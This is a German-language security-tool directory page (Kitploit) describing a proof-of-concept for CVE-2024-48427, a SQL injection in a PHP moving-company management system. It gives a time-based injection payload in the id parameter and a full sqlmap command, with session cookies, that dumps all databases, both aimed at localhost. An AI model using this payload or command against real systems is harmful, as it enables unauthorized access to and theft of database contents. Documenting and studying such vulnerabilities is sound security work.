Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-48427 — Proof-of-Concept für CVE-2024-48427: SQL-Injection in Sourcecodester Packers and Movers Management System v1.0. Nutzt den id-Parameter aus, um beliebige SQL-Befehle auszuführen und Datenbankinhalte auszulesen. | Kitploit
Tools/GitHubGitHub/vighneshnair7/cve-2024-48427
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsDatenbanksicherheit
GitHubvighneshnair7/cve-2024-48427

CVE-2024-48427

Proof-of-Concept für CVE-2024-48427: SQL-Injection in Sourcecodester Packers and Movers Management System v1.0. Nutzt den id-Parameter aus, um beliebige SQL-Befehle auszuführen und Datenbankinhalte auszulesen.

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-48427

Beschreibung

Eine SQL-Injection-Schwachstelle im Sourcecodester Packers and Movers Management System v1.0 ermöglicht es entfernten authentifizierten Benutzern, beliebige SQL-Befehle über den id-Parameter in /mpms/admin/?page=services/manage_service&id auszuführen.

Art der Schwachstelle

SQL Injection

Hersteller des Produkts

Sourcecodester

Betroffene Produktcodebasis:

https://www.sourcecodester.com/php/15360/packers-and-movers-management-system-phpoop-free-source-code.html - 1.0

Betroffene Komponente:

Der id-Parameter von Update Service Details unter /mpms/admin/?page=services/manage_service&id

Angriffsvektoren:

  1. Richten Sie die Anwendung lokal ein und melden Sie sich mit den angegebenen Standard-Anmeldedaten im Admin-Panel an.
  2. Navigieren Sie zur verwundbaren Seite: http://localhost/mpms/admin/?page=services/manage_service&id=2
  3. Fügen Sie SQL-Payload in den id-Parameter ein: http://localhost/mpms/admin/?page=services/manage_service&id=1' OR SLEEP(5)-- puNr
  4. Beobachten Sie die Anwendungsantwort: Die Seite sollte merklich länger (5 Sekunden) zum Laden brauchen, wenn die Injektion erfolgreich ist, was bestätigt, dass der id-Parameter für SQL-Injection anfällig ist.
  5. Führen Sie nun das SQLMap-Tool aus, um Datenbankdetails auszulesen:
  6. sqlmap -u "http://localhost/mpms/admin/?page=services/manage_service&id=1" --cookie="phpMyAdmin=ju34bd3d8q0jdf6td4ntqscaqd;PHPSESSID=eopn8q1p8c1f5m1v5igjoir8k1;" --dbms mysql -p id --risk 3 --level 4 --dbs --dump

Referenzen:

  1. https://owasp.org/www-community/attacks/SQL_Injection
  2. https://portswigger.net/web-security/sql-injection
Tool herunterladen